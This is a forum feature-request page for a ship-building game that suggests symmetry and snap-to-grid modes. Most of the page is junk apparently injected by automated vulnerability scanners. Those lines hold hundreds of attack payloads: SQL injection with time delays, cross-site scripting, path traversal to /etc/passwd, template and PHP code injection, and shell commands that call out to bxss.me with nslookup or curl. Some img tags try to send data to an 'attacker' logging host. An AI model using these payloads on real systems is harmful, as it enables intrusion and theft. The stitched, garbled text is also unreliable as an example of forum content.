I think you should have a symmetry mode for making ships and a snap to grid mode so that it makes ships look better if you want that like maybe hold s for symmetry and g for the grid.
747 agree
Unvote8111 agree
2897 agree
837 agree
810 agree
795 agree
790 agree
747 agree
745 agree
704 agree
703 agree
692 agree
681 agree
674 agree
666 agree
642 agree
629 agree
628 agree
618 agree
617 agree
615 agree
609 agree
605 agree
603 agree
601 agree
598 agree
592 agree
567 agree
561 agree
560 agree
547 agree
543 agree
535 agree
533 agree
532 agree
529 agree
528 agree
522 agree
520 agree
515 agree
513 agree
507 agree
506 agree
503 agree
501 agree
494 agree
494 agree
480 agree
473 agree
472 agree
450 agree
Anonymous
tdetgasGandhi-Chan
Good idea.J
OppJ
OppJ
OppJ
OppJ
OppJ
OppJmanchegozapata
yess, do itJmanchegozapata
yess, do itJmanchegozapata
yess, do itJJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1bVCFLO1BbLhKcFGcO
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${9999900+9999108}${10000357+10000390}
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
echo mwvftm$()\ wvvkpi\nz^xyu||a #' &echo mwvftm$()\ wvvkpi\nz^xyu||a #|" &echo mwvftm$()\ wvvkpi\nz^xyu||a #WfxYANoW
response.write(9665125*9162056)WfxYANoW
'+response.write(9665125*9162056)+'Anonymous
1WfxYANoW
&echo qbvtep$()\ kujupm\nz^xyu||a #' &echo qbvtep$()\ kujupm\nz^xyu||a #|" &echo qbvtep$()\ kujupm\nz^xyu||a #WfxYANoW
file:///etc/passwdWfxYANoW
"+response.write(9665125*9162056)+"WfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpgresponse.write(9959785*9047579)
1WfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
http://bxss.me/t/fit.txt?.jpg'+response.write(9959785*9047579)+'
1WfxYANoW
KPeAFTHFWfxYANoW
1WfxYANoW
KrWKqjue: fsuex9ZL"+response.write(9959785*9047579)+"
1lTLQDNfG
1WfxYANoW
/etc/shellsWfxYANoW
../1WfxYANoW
1&n930314=v930316WfxYANoW
1&echo uuvspg$()\ iujcqy\nz^xyu||a #' &echo uuvspg$()\ iujcqy\nz^xyu||a #|" &echo uuvspg$()\ iujcqy\nz^xyu||a #d09kcTBWZ1U=
1WfxYANoW
)WfxYANoW
|echo sxyymm$()\ mdnnxx\nz^xyu||a #' |echo sxyymm$()\ mdnnxx\nz^xyu||a #|" |echo sxyymm$()\ mdnnxx\nz^xyu||a #WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
!(()&&!|*|*|WfxYANoW&n934534=v970967
1WfxYANoW
c:/windows/win.iniWfxYANoW
1WfxYANoW
1|echo zsbqgl$()\ efwpum\nz^xyu||a #' |echo zsbqgl$()\ efwpum\nz^xyu||a #|" |echo zsbqgl$()\ efwpum\nz^xyu||a #WfxYANoW
(nslookup -q=cname hitiobjscjkju3a138.bxss.me||curl hitiobjscjkju3a138.bxss.me))JuIOyspN: oHpznrbK
1WfxYANoW
$(nslookup -q=cname hitwxwlgiwplx486e2.bxss.me||curl hitwxwlgiwplx486e2.bxss.me)WfxYANoW
^(#$!@#$)(()))******WfxYANoW
bxss.meWfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))file:///etc/passwd
1WfxYANoW
'"()WfxYANoW
'.gethostbyname(lc('hitmk'.'wypircdk346c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(89).chr(110).chr(86).'WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
1'&&sleep(27*1000)*ozmujf&&'WfxYANoW
';print(md5(31337));$a='WfxYANoW
1WfxYANoW
xfs.bxss.meWfxYANoW
&nslookup -q=cname hitalhnmzcvaq70044.bxss.me&'\"`0&nslookup -q=cname hitalhnmzcvaq70044.bxss.me&`')
1../WfxYANoW
1WfxYANoW
&(nslookup -q=cname hitntelasuekndbc7b.bxss.me||curl hitntelasuekndbc7b.bxss.me)&'\"`0&(nslookup -q=cname hitntelasuekndbc7b.bxss.me||curl hitntelasuekndbc7b.bxss.me)&`'xfs.bxss.me
1WfxYANoW
'"1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1WfxYANoW
|(nslookup -q=cname hitttykstewgkce25a.bxss.me||curl hitttykstewgkce25a.bxss.me)WfxYANoW
".gethostbyname(lc("hityx"."esjkngyq09702.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(86).chr(115).chr(86)."Http://bxss.me/t/fit.txt
1WfxYANoW
1'"()&%<zzz><ScRiPt >VS7m(9607)</ScRiPt>WfxYANoW
";print(md5(31337));$a="WfxYANoW
<!--WfxYANoW
1"&&sleep(27*1000)*nwofko&&"WfxYANoW
'"()&%<zzz><ScRiPt >VS7m(9646)</ScRiPt>'"
1WfxYANoW
`(nslookup -q=cname hitdfoorkbwct1e22a.bxss.me||curl hitdfoorkbwct1e22a.bxss.me)`http://bxss.me/t/fit.txt?.jpg
1!(()&&!|*|*|
1WfxYANoW
gethostbyname(lc('hitba'.'wgsavxwy13813.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(65).chr(107).chr(87)^(#$!@#$)(()))******
1WfxYANoW
1'||sleep(27*1000)*syojdu||'<!--
1WfxYANoW
${@print(md5(31337))}WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(120).concat(79).concat(116).concat(90)+(require"socket" Socket.gethostbyname("hitve"+"qvcnuokp38c62.bxss.me.")[3].to_s)+"/etc/shells
1WfxYANoW
${@print(md5(31337))}\WfxYANoW
;(nslookup -q=cname hitvmfoclqcqpdea7a.bxss.me||curl hitvmfoclqcqpdea7a.bxss.me)|(nslookup -q=cname hitvmfoclqcqpdea7a.bxss.me||curl hitvmfoclqcqpdea7a.bxss.me)&(nslookup -q=cname hitvmfoclqcqpdea7a.bxss.me||curl hitvmfoclqcqpdea7a.bxss.me)WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(100).concat(84).concat(102).concat(90)+(require'socket' Socket.gethostbyname('hitek'+'adomintpa2c6a.bxss.me.')[3].to_s)+'WfxYANoW
'.print(md5(31337)).'WfxYANoW
19482746WfxYANoW
1"||sleep(27*1000)*cfwdqd||"WfxYANoW
'A'.concat(70-3).concat(22*4).concat(108).concat(79).concat(118).concat(78)+(require'socket' Socket.gethostbyname('hitck'+'zyvmlmtk1e42b.bxss.me.')[3].to_s)WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitbxcsvtutmr7c78c.bxss.me||curl${IFS}hitbxcsvtutmr7c78c.bxss.me)WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitrldxlofpgrbe0ce.bxss.me||curl${IFS}hitrldxlofpgrbe0ce.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrldxlofpgrbe0ce.bxss.me||curl${IFS}hitrldxlofpgrbe0ce.bxss.me)&`'WfxYANoW
1WfxYANoW
bfg2444<s1﹥s2ʺs3ʹhjl2444'"()
1WfxYANoW
commentWfxYANoW'&&sleep(27*1000)*dqakoj&&'
1WfxYANoW
1c:/windows/win.ini
1WfxYANoW
bxss.me/t/xss.html?%00';print(md5(31337));$a='
1WfxYANoW"&&sleep(27*1000)*sxcnng&&"
1WfxYANoW
comment";print(md5(31337));$a="
1${@print(md5(31337))}
1WfxYANoW'||sleep(27*1000)*qprmgb||'
1${@print(md5(31337))}\
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
comment/.HttP://bxss.me/t/xss.html?%00
1bxss.me
1bxss.me/t/xss.html?%00
1'.print(md5(31337)).'
1comment
1WfxYANoW"||sleep(27*1000)*qppmfr||"
1WfxYANoW
<th:t="${dfb}#foreachcomment
1comment/.
1WfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >VS7m(9442)</ScRiPt>WfxYANoW
1<WV8L49>XPINH[!+!]</WV8L49>WfxYANoW
1<script>VS7m(9132)</script>WfxYANoW
1<script>VS7m(9646)</script>9646WfxYANoW
1WfxYANoW
1<ScR<ScRiPt>IpT>VS7m(9626)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >VS7m(9255)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9075></ScRiPt>WfxYANoW
1<ScRiPt >VS7m(9202)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=VS7m(9131)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9786'>WfxYANoW
1<body onload=VS7m(9593)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=VS7m(9758)>WfxYANoW
1<img src=xyz OnErRor=VS7m(9987)>WfxYANoW
1<img/src=">" onerror=alert(9692)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%56%53%37%6D%289391%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1w6lfoQZ5WfxYANoW
1\u003CScRiPt\VS7m(9031)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>VS7m(9990)</sCripT>WfxYANoW
1<input autofocus onfocus=VS7m(9911)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(VS7m(9076))}WfxYANoW
1triq6 <ScRiPt >VS7m(9474)</ScRiPt>WfxYANoW
1<WUYOCI>LLZ2D[!+!]</WUYOCI>WfxYANoW
1<ifRAme sRc=9069.com></IfRamE>WfxYANoW
1<aCn005B x=9855>WfxYANoW
1WfxYANoW
1<img sRc='http://attacker-9923/log.php?WfxYANoW
-1 OR 2+451-451-1=0+0+0+1 --WfxYANoW
1<aTr4yxC<WfxYANoW
-1 OR 2+317-317-1=0+0+0+1WfxYANoW'"()&%<zzz><ScRiPt >VS7m(9755)</ScRiPt>
1WfxYANoW
-1' OR 2+974-974-1=0+0+0+1 --'"()&%<zzz><ScRiPt >VS7m(9943)</ScRiPt>
1WfxYANoW
-1' OR 2+26-26-1=0+0+0+1 or 'mfTS81H0'='WfxYANoW9491836
1bfg6809<s1﹥s2ʺs3ʹhjl6809
1WfxYANoW
-1" OR 2+78-78-1=0+0+0+1 --<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >VS7m(9080)</ScRiPt>
1WfxYANoW<W9CWA3>NN74X[!+!]</W9CWA3>
1WfxYANoW<script>VS7m(9951)</script>
1WfxYANoW<script>VS7m(9597)</script>9597
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW<ScRiPt >VS7m(9494)</ScRiPt>
1WfxYANoW<ScRiPt >VS7m(9664)</ScRiPt>
1WfxYANoW<body onload=VS7m(9338)>
1WfxYANoW<img src=xyz OnErRor=VS7m(9727)>
1WfxYANoW<img/src=">" onerror=alert(9777)>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW\u003CScRiPt\VS7m(9913)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>VS7m(9823)</sCripT>
1WfxYANoW<input autofocus onfocus=VS7m(9455)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(VS7m(9873))}
1WfxYANoWJ06q8 <ScRiPt >VS7m(9667)</ScRiPt>
1WfxYANoW<WKEYO9>5HJD9[!+!]</WKEYO9>
1WfxYANoW<ifRAme sRc=9035.com></IfRamE>
1WfxYANoW<aSXAo5t x=9080>
1WfxYANoW<img sRc='http://attacker-9386/log.php?
1WfxYANoW<acvX8eU<
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1OnINDouZ'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 658=(SELECT 658 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 89=(SELECT 89 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 407=(SELECT 407 FROM PG_SLEEP(15))--WfxYANoW
1bbaHQeFx' OR 443=(SELECT 443 FROM PG_SLEEP(15))--WfxYANoW
1o7hz26zk') OR 606=(SELECT 606 FROM PG_SLEEP(15))--WfxYANoW
10QCJ5bAs')) OR 946=(SELECT 946 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@9E1uqWfxYANoW
1WfxYANoW
1WfxYANoWH5pHg9Qh
1WfxYANoW
1-1 OR 2+719-719-1=0+0+0+1 --
1-1 OR 2+517-517-1=0+0+0+1
1-1' OR 2+595-595-1=0+0+0+1 --
1-1' OR 2+690-690-1=0+0+0+1 or '5kyMTcTc'='
1-1" OR 2+366-366-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWQp3caxNl'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@OetTs
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.comlfmlpnih
1yslqkvkj
response.write(9126704*9368306)pahdxtvu
1lrxersyu
set|set&setyslqkvkj
'+response.write(9126704*9368306)+'pahdxtvu
1lrxersyu
$(nslookup De1Z8npv)yslqkvkj
"+response.write(9126704*9368306)+"pahdxtvu
0C4TXenflrxersyu
&nslookup 2a3W4Fi9&'\"`0&nslookup 2a3W4Fi9&`'response.write(9496776*9827119)
1pahdxtvu
-1 OR 2+802-802-1=0+0+0+1 --set|set&set
1'+response.write(9496776*9827119)+'
1pahdxtvu
-1 OR 2+464-464-1=0+0+0+1$(nslookup D7KaexPd)
1"+response.write(9496776*9827119)+"
1pahdxtvu
-1' OR 2+498-498-1=0+0+0+1 --&nslookup Aeec8wiE&'\"`0&nslookup Aeec8wiE&`'
1fgmdidtn
HjyX5dn1pahdxtvu
-1' OR 2+23-23-1=0+0+0+1 or 'R4eS2IV5'='qjbivkwc
../../../../../../../../../../etc/passwdKki5FhPI
1pahdxtvu
-1" OR 2+56-56-1=0+0+0+1 --qjbivkwc
../../../../../../../../../../../../../../../proc/versionfglsavua
1pahdxtvu
if(now()=sysdate(),sleep(22),0)/*'XOR(if(now()=sysdate(),sleep(22),0))OR'"XOR(if(now()=sysdate(),sleep(22),0))OR"*/qjbivkwc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpghmwiofmj
${9999870+9999575}pahdxtvu
(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/qjbivkwc
../../../../../../../../../../etc/passwd.jpg${9999988+9999453}
1pahdxtvu
-1; waitfor delay '0:0:7' --qjbivkwc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgcyoxbytf
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgOEczSjllTHk=
1pahdxtvu
-1); waitfor delay '0:0:7' --qjbivkwc
/../..//../..//../..//../..//../..//etc/passwd.jpgcyoxbytf
1some_inexistent_file_with_long_name.jpgwyxxepgf
1&n959608=v997184fglsavua
1pahdxtvu
1 waitfor delay '0:0:15' --qjbivkwc
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdcyoxbytf
Http://testasp.vulnweb.com/t/fit.txtAnonymous
1pahdxtvu
ojT41Lie'; waitfor delay '0:0:15' --qjbivkwc
/etc/passwdcyoxbytf
http://testasp.vulnweb.com/t/fit.txt?.jpgiadrjfel&n981415=v939994
1pahdxtvu
-1;select pg_sleep(15); --qjbivkwc
%2fetc%2fpasswdcyoxbytf
testasp.vulnweb.compahdxtvu
-1);select pg_sleep(22); --qjbivkwc
/.././.././.././.././.././.././.././../etc/./passwd%00jafqixnc
)pahdxtvu
-1));select pg_sleep(22); --qjbivkwc
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdcglmwkmn
;print(md5(acunetix_wvs_security_test));1some_inexistent_file_with_long_name.jpg
1jafqixnc
!(()&&!|*|*|rqpfbgef
'"()pahdxtvu
hnBCAeEx';select pg_sleep(22); --qjbivkwc
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdcglmwkmn
';print(md5(acunetix_wvs_security_test));$a='Http://testasp.vulnweb.com/t/fit.txt
1jafqixnc
^(#$!@#$)(()))******pahdxtvu
mFdt32el');select pg_sleep(22); --cglmwkmn
";print(md5(acunetix_wvs_security_test));$a="http://testasp.vulnweb.com/t/fit.txt?.jpg
1)
1'"()
1pahdxtvu
pTHlg1hM'));select pg_sleep(22); --qjbivkwc
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.cglmwkmn
${@print(md5(acunetix_wvs_security_test))}testasp.vulnweb.com
1!(()&&!|*|*|
1euhaahfw
http://testasp.vulnweb.com/t/xss.html?%00.jpgpahdxtvu
1qjbivkwc
file:///etc/passwdcglmwkmn
${@print(md5(acunetix_wvs_security_test))}\wgmemjgf
1^(#$!@#$)(()))******
1rdhddhfa
http://hithY7YduKmuO.bxss.me/http://testasp.vulnweb.com/t/xss.html?%00.jpg
1pahdxtvu
1qjbivkwc
/\../\../\../\../\../\../\../etc/passwd;print(md5(acunetix_wvs_security_test));
1wgmemjgf
commentelcniwbp
1http://hitdJyzPEDL9g.bxss.me/
1tdabwxyc
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))LTxOdpSI
1qjbivkwc
WEB-INF/web.xml';print(md5(acunetix_wvs_security_test));$a='
1wgmemjgf
commentelcniwbp
1'"gdjffyun
/www.vulnweb.com-1 OR 2+779-779-1=0+0+0+1 --
1qjbivkwc
/WEB-INF/web.xml";print(md5(acunetix_wvs_security_test));$a="
1wgmemjgf
comment/.elcniwbp
\/www.vulnweb.com
1psinprqr
'"-1 OR 2+286-286-1=0+0+0+1
1qjbivkwc
WEB-INF\web.xml${@print(md5(acunetix_wvs_security_test))}
1wgmemjgf
1sxgfhynh
1'"()&%<acx><ScRiPt >CtgT(9439)</ScRiPt>psinprqr
<!---1' OR 2+873-873-1=0+0+0+1 --
1../../../../../../../../../../etc/passwd
1${@print(md5(acunetix_wvs_security_test))}\
1comment
1elcniwbp
@@S17RK'"
1-1' OR 2+396-396-1=0+0+0+1 or 'vYdDqI4b'='
1comment
1elcniwbp
JyI=sxgfhynh
'"()&%<acx><ScRiPt >CtgT(9358)</ScRiPt><!--
1-1" OR 2+946-946-1=0+0+0+1 --
1comment/.
1../../../../../../../../../../etc/passwd.jpg
1sxgfhynh
1_9960elcniwbp
(select convert(int,CHAR(65)))1 waitfor delay '0:0:8' --
1elcniwbp
1sxgfhynh
acu3004<s1﹥s2ʺs3ʹuca3004TzoiqUtC'; waitfor delay '0:0:8' --
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
11'"
1nLTdUPeI';select pg_sleep(8); --
1/etc/passwd
1\
10VXNs81Z');select pg_sleep(8); --
1%2fetc%2fpasswd
1RsPCZC9b'));select pg_sleep(17); --
1@@KUTb0
1sxgfhynh
{{10000044*10000473}}JyI=
1sxgfhynh
1<ScRiPt >CtgT(9813)</ScRiPt>(select convert(int,CHAR(65)))
1sxgfhynh
1<WDSTJB>F6VFM[!+!]</WDSTJB>file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1sxgfhynh
1<script>CtgT(9048)</script>WEB-INF/web.xml
1/WEB-INF/web.xml
1sxgfhynh
1<ScR<ScRiPt>IpT>CtgT(9136)</sCr<ScRiPt>IpT>WEB-INF\web.xml
1sxgfhynh
1<ScRiPt >CtgT(9553)</ScRiPt>sxgfhynh
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9259></ScRiPt>sxgfhynh
1<ScRiPt >CtgT(9816)</ScRiPt>sxgfhynh
1<video><source onerror="javascript:CtgT(9874)">sxgfhynh
1<isindex type=image src=1 onerror=CtgT(9363)>sxgfhynh
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9011'>sxgfhynh
1<body onload=CtgT(9924)>sxgfhynh
1<img src=//testasp.vulnweb.com/t/dot.gif onload=CtgT(9879)>sxgfhynh
1<img src=xyz OnErRor=CtgT(9076)>sxgfhynh
1<img/src=">" onerror=alert(9135)>sxgfhynh
%31%3C%53%63%52%69%50%74%20%3E%43%74%67%54%289819%29%3C%2F%73%43%72%69%70%54%3Esxgfhynh
1\u003CScRiPt\CtgT(9911)\u003C/sCripT\u003Esxgfhynh
1<ScRiPt>CtgT(9805)</sCripT>sxgfhynh
1<input autofocus onfocus=CtgT(9763)>sxgfhynh
<a HrEF=http://www.vulnweb.com></a>sxgfhynh
<a HrEF=jaVaScRiPT:>sxgfhynh
[url=http://www.vulnweb.com][/url]sxgfhynh
1<img<!-- --> src=x onerror=alert(9249);//><!-- -->sxgfhynh
1}body{acu:Expre/**/SSion(CtgT(9730))}sxgfhynh
1<% contenteditable onresize=CtgT(9980)>sxgfhynh
1_vxvZz <ScRiPt >CtgT(9506)</ScRiPt>sxgfhynh
1<WHR3SP>RR7Z5[!+!]</WHR3SP>sxgfhynh
1<ifRAme sRc=9142.com></IfRamE>sxgfhynh
1<KUHz9T x=9926>sxgfhynh
1<img sRc='http://attacker-9336/log.php?sxgfhynh'"()&%<acx><ScRiPt >CtgT(9493)</ScRiPt>
1'"()&%<acx><ScRiPt >CtgT(9172)</ScRiPt>
1sxgfhynh_9574
1acu2506<s1﹥s2ʺs3ʹuca2506
1{{9999260*9999889}}
1sxgfhynh<ScRiPt >CtgT(9935)</ScRiPt>
1sxgfhynh<W42AXS>SSRIP[!+!]</W42AXS>
1sxgfhynh<script>CtgT(9431)</script>
1sxgfhynh<ScRiPt >CtgT(9787)</ScRiPt>
1sxgfhynh<ScRiPt >CtgT(9859)</ScRiPt>
1sxgfhynh<body onload=CtgT(9265)>
1sxgfhynh<img src=xyz OnErRor=CtgT(9647)>
1sxgfhynh<img/src=">" onerror=alert(9563)>
1sxgfhynh\u003CScRiPt\CtgT(9198)\u003C/sCripT\u003E
1sxgfhynh<ScRiPt>CtgT(9866)</sCripT>
1sxgfhynh<input autofocus onfocus=CtgT(9824)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1sxgfhynh}body{acu:Expre/**/SSion(CtgT(9315))}
1sxgfhynh<% contenteditable onresize=CtgT(9994)>
1sxgfhynh_Q3CPh <ScRiPt >CtgT(9408)</ScRiPt>
1sxgfhynh<W4YZPH>P9NO2[!+!]</W4YZPH>
1sxgfhynh<ifRAme sRc=9285.com></IfRamE>
1sxgfhynh<5hvbhS x=9140>
1sxgfhynh<img sRc='http://attacker-9932/log.php?
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1OAz14zsjdwUQQUrL
1dwUQQUrL
-1 OR 2+195-195-1=0+0+0+1 --dwUQQUrL
-1 OR 2+358-358-1=0+0+0+1dwUQQUrL
-1' OR 2+156-156-1=0+0+0+1 --dwUQQUrL
-1' OR 2+192-192-1=0+0+0+1 or 'HCbwsZA8'='dwUQQUrL
-1" OR 2+432-432-1=0+0+0+1 --dwUQQUrL
1*if(now()=sysdate(),sleep(15),0)dwUQQUrL
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZdwUQQUrL
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZdwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/dwUQQUrL
1-1; waitfor delay '0:0:15' --dwUQQUrL
1-1); waitfor delay '0:0:15' --dwUQQUrL
1-1 waitfor delay '0:0:15' --dwUQQUrL
1KESGhVB7'; waitfor delay '0:0:15' --dwUQQUrL
1-1 OR 731=(SELECT 731 FROM PG_SLEEP(15))--dwUQQUrL
1-1) OR 842=(SELECT 842 FROM PG_SLEEP(15))--dwUQQUrL
1-1)) OR 382=(SELECT 382 FROM PG_SLEEP(15))--dwUQQUrL
1muqnkSuU' OR 172=(SELECT 172 FROM PG_SLEEP(15))--dwUQQUrL
1Iw1NdoLa') OR 862=(SELECT 862 FROM PG_SLEEP(15))--dwUQQUrL
1kDHBG0qI')) OR 105=(SELECT 105 FROM PG_SLEEP(15))--dwUQQUrL
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)dwUQQUrL
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'dwUQQUrL
1dwUQQUrL
1'"dwUQQUrL
@@6tqhmdwUQQUrL
1dwUQQUrL
1dwUQQUrLHOUYU5ry
1dwUQQUrL
1-1 OR 2+302-302-1=0+0+0+1 --
1-1 OR 2+23-23-1=0+0+0+1
1-1' OR 2+791-791-1=0+0+0+1 --
1-1' OR 2+895-895-1=0+0+0+1 or 'L52bmKvD'='
1-1" OR 2+316-316-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1dwUQQUrL-1 waitfor delay '0:0:15' --
1dwUQQUrLj2lK4RlB'; waitfor delay '0:0:15' --
1dwUQQUrL
1dwUQQUrL'"
1@@And11
1dwUQQUrL
1Comment